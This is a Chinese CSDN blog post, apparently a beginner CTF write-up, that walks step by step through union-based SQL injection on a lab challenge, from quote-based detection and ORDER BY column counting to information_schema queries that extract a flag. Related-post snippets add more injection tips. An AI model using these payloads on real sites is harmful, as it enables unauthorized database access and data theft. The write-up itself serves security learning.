CTF从零到一 SQL注入-1

最新推荐文章于 2024-05-17 08:39:11 发布
最新推荐文章于 2024-05-17 08:39:11 发布
阅读量1.8k 收藏 18
点赞数 3
分类专栏: ctf从零到一 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shirazawah/article/details/120295530
版权

 看到id=1 首先要判断是字符型还是数字型注入

根据书上方法判断数字型

id=3-2

返回页面与id=1的页面不同,说明不是数字型

加入单引号判断是否为字符型

id=1%27(这里'被转译成%27)

 没有任何返回,说明有错误,存在注入。

接下来使用order by 判断表的列数。

id=1' order by 3 --+  (空格为%20 --+注释后面的语句)

显示正常

id=1' order by 4 --+

 说明一共有三列

接着我们使用union来进行查询

union又叫联合查询,将俩个或更多个查询结果组合为单个结果集。

要遵循所有查询中列数必须相同,数据类型必须兼容。

id=-1' union select 1,2,3 --+

这里id为-1是因为要让服务端返回union select 的结果,把id设置为-1,因为数据库没有-1的数据,所有会返回select的结果。

返回2,3,这意味着 2和3的位置可以输入sql语句,比如直接在2输入database()查询当前数据库

 当前数据库是note。

我们要查询当前一共有哪些数据库,这时候要知道一个sql5.0以后自带的一个数据库

information_schema,在这个数据库中可以查询所有数据库名,字段名和表名。

id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = database() --+

 一共有俩个数据库,想知道flag很明显在fl4g的数据库里,继续查询fl4g数据库里的字段有什么

id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name = 'fl4g' --+

 看到一个字段fllllag,直接查询这个字段

id=-1 union select 1,fllllag,3 from fl4g --+

 成功获得flag

shirazawah
关注
  • 3
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
[CTF从0到1学习] 二、CTF 密码学
qq_43710889的博客
12-05 7881
密码学 概述 密码学是研究编制密码和破译密码的技术科学 使信息保密的技术和科学学叫密码编码学 破译密文的科学与技术叫密码分析学 信息安全的基本模型 密码学基本概念 明文:没有加密的文字or字符串 密文:对明文加密之后的报文 加密算法: 解密算法 加密密钥 解密密钥 单钥密码体系 双钥密码体系 密码学的历史与发展 第一阶段(1949年前) 古典密码发展阶段 隐写术,暗语,隐语,藏头诗等 采用手工或机械变换的方式实现 单表代换密码:Caesar密码、仿射密
SQL注入(字符型,单引号闭合)
weixin_43695031的博客
11-06 7694
SQL注入(字符型,单引号闭合) 1、判断为字符型还是整型,?为连接符 ?id=1 and 1=2 当不报错说明为字符型,反之则是整型 2、构造闭合 ?id=1’and%20 ‘1’='1 说明是单引号闭合则可以用 --+ 来注释掉后面的 ’ 例如:?id=1’ --+ 也可以用 **?id=1’**来判断,出错了就说明判断对了,因为在源语句中后面多出了一个 ’ ,所以采用上面 –+ 来注释掉后面...
mysql&&sql注入+ctf+web安全
10-08
mysql&&sql注入+ctf+web安全
SQL注入介绍_sql注入id=-1含义,2024年最新征服网络安全面试官
ccc6553584的博客
04-18 371
如果上一次页面正常,这次页面不正常,那么说明存在cookie注入漏洞,可以通过常规方法注入即可,只是cookie注入相对比较麻烦,需要每一次都在浏览器中执行写cookie代码。按下回车,访问该url,如果发现页面正常显示了,到此可以证明,我们正在接受的页面存在request方法获取参数,可能存在cookie注入的风险。,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~//这里的xxx就是上一步中id=xxx中的参数值。
SQL注入原理及PHP防注入代码.pdf
03-31
SQL注入基本概念,原理,防注入php代码以及 相关的图片实例,具体可下载查看。
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
【转】CTF-All-In-One(CTF从入门到放弃)pdf
03-20
CTF-All-In-One(CTF 从入门到放弃) ——“与其相信谣言,不如一直学习。”
ctf从0到1
mingyqf的博客
02-28 1793
网站链接: https://www.ichunqiu.com/battalion?t=1&r=68487 举足轻重的信息搜集 第一题:常见的搜集 进入环境,用dirsearch扫一下,发现存在vim备份文件,gedit备份文件和robots.txt文件。 robots.txt直接访问,发现flag1_is_her3_fun.txt,直接访问发现了flag1。 index.php~直接访问,发现flag2。 直接访问.index.php.swp,把vim备份文件下载下来,然后vim -r inde
CTF从0到1,web1-2
weixin_45486362的博客
06-15 248
本地成功配置环境,访问如图: http://127.0.0.1/ 提示Git泄露,直接利用GitHack.py工具: 下载地址:https://github.com/lijiejie/GitHack 命令:python2 GitHack.py http://127.0.0.1/.git/ 结果如下: 查看index.html文档发现: Congrandulations!!! ...
[CTF]从0到1之敏感文件的泄露
hclimg的博客
11-29 2243
题目:敏感文件的泄露 题目来源:从0到1的原题,使用了线上的环境 敏感文件第一个想到的是robots.txt文件,在链接后面加此路径,看到flag文件,访问得到一部分flag 第二个敏感文件是gedit备份文件,在index.php地址后面添加~符号,得到第二部分flag 第三个敏感文件是vim备份文件,在首页地址后面添加.swp,下载到首页的备份文件 然后使用vim -r index.php.swp 恢复文件,看到flag 整合三个flag碎片,即可! ...
[CTF从0到1学习] 一、CTF 概述
qq_43710889的博客
11-13 5729
[CTF从0到1学习] 一、CTF 概述 哈哈,在学校图书馆借到的一本比较好的讲CTF的书籍,因为有配套资料。感觉不错,准备研读一波。先做一个引言吧‘’ 首先大家能搜到这篇文章,也一定对CTF有一定了解,亦或是对网络安全感兴趣。这篇文章会分享CTF的起源,模式,所需要的基本技能的一个概述。 文章目录[CTF从0到1学习] 一、CTF 概述CTF起源CTF模式CTF必备的基础技能CTF环境搭建 CTF起源 CTF起源与1996年的DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的
sql注入攻击流量情况
07-18
sql注入攻击流量情况
SQL注入漏洞演示源代码
07-15
SQL注入漏洞演示源代码 更多免费资源请查看:http://download.csdn.net/user/php_fly
Sql注入总结
weixin_40709439的博客
05-12 1971
Sql注入总结 联合查询: 1、利用闭合变量报错测试注入点, ?id=1’ .这样说明存在单引号闭合注入 2、是否存在注入点,用and语句测试 ?id=1’ and 1=2# ?id=1’ and 1=1# 3、猜测字段 ,?id=1’ order by 3%23 4、找到页面中数据输入点, ?id=-1’ union select 1,2,3%23 5、查数据库,?id=1’ union ...
SQL注入介绍_sql注入id=-1含义(1)
最新发布
2401_84281720的博客
05-17 1003
id=-1’ union select 1,要查询的字段名1,要查询的字段名2 from 要查询的表 //查询一年字段中的内容?id=-1’ union select 1,unhex(hex(username)),unhex(hex(password)),4 from admin //若内容无法显示,则unhex编码。
渗透学习笔记(三)--SQL注入学习(一)
CK_0ff的博客
01-17 2590
文章目录sql注入常见攻击思路常见流程 使用靶场为sqli靶场 例题为GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入) sql注入常见攻击思路 1:寻找到SQL注入的位置 2:判断服务器类型和后台数据库类型 3:针对不同的服务器和数据库特点进行SQL注入攻击 常见流程 首先判断sql语句闭合方式 常见的闭合方式: id = 'input_id' id = ('input_id') id = "input_id" id = ("
CTF 小白教程《从0到1:CTFer成长之路》SQL - 2 解题过程
在下小黄的博客
06-07 2393
大家好! 我是小黄,很高兴又跟大家见面啦 ! 拒绝水文,从我做起 !!!! 未经允许,禁止转载 ,违者必究!!!! 本实验仅适用于学习和测试 ,严禁违法操作 ! ! ! 今天更新的是: 小白教程《从0到1:CTFer成长之路》结题过程 《从0到1:CTFer成长之路》书籍配套题目,点击即可打开 - 实验环境(i 春秋 需要登录) 微信公众号回复:【CTF】,即可获取本文全部涉及到的工具。 创建时间:2021年5月30日 软件: MindMaster Pro、kali 这里写目录标题CTF
mysql注入ctf_CTFsql注入(1)
weixin_30451613的博客
01-28 340
题目地址:http://chinalover.sinaapp.com/web6/index.php由图可知,此处给出了源码,源码如下:分析源码:页面中输入的参数传到php中,if()对user和pass都进行了是否为空值的判断,若都不为空,则来连接数据库。然后再把页面中的user值赋值给 $user ,把页面中的pass值md5加密后赋值给 $pass ,最后拼接sql语句并执行。而要让flag成...
CTF」-「SQL」- 简单的SQL注入1
小落的博客
10-26 575
简单的SQL注入1 测试注入点 测试过滤规则 简单的添加一个union,发现没有过滤 (1union 这怎么有点像php弱类型了) 在union加一个空格以及一个and,发现union被过滤,那么可以猜测他的过滤规则和两端的空格有关。、 3. 查看到底有几个关键词被过滤了 1 union select group_concat(table_name) from informa...
ctf sql注入题目
09-15
CTF(Capture The Flag)中的SQL注入题目提供了一个模拟真实情境下的网络安全挑战,旨在测试参与者对于SQL注入漏洞的理解和应用能力。以下是一些CTF SQL注入题目的例子: 1. BUUCTF-[极客大挑战 2019]EasySQL 这是一道较为简单的SQL注入题目,提供了一个特定的注入点,要求参与者利用SQL注入漏洞获取特定的信息或完成特定的任务。 2. CTFSHOW-sql注入(一) 这是CTFSHOW平台上的一个系列题目,主要介绍了SQL注入的基础知识点和常见题型。参与者可以通过完成不同的题目来逐步提升自己的SQL注入技能。 3. web 171(万能密码) 这是一个具有万能密码漏洞的网页应用题目。参与者需要在登录页面的密码字段中输入特定的注入payload,以绕过身份验证,获取敏感信息或进行其他未授权的操作。 4. web 172(过滤回显内容) 这是一个具有回显内容过滤漏洞的网页应用题目。参与者需要在输入框中构造特定的注入payload,以绕过过滤机制并成功回显注入结果。 这些题目的目的是帮助参与者了解、掌握和应用SQL注入漏洞的原理和技巧,提高其对于Web应用安全的认识和实践能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值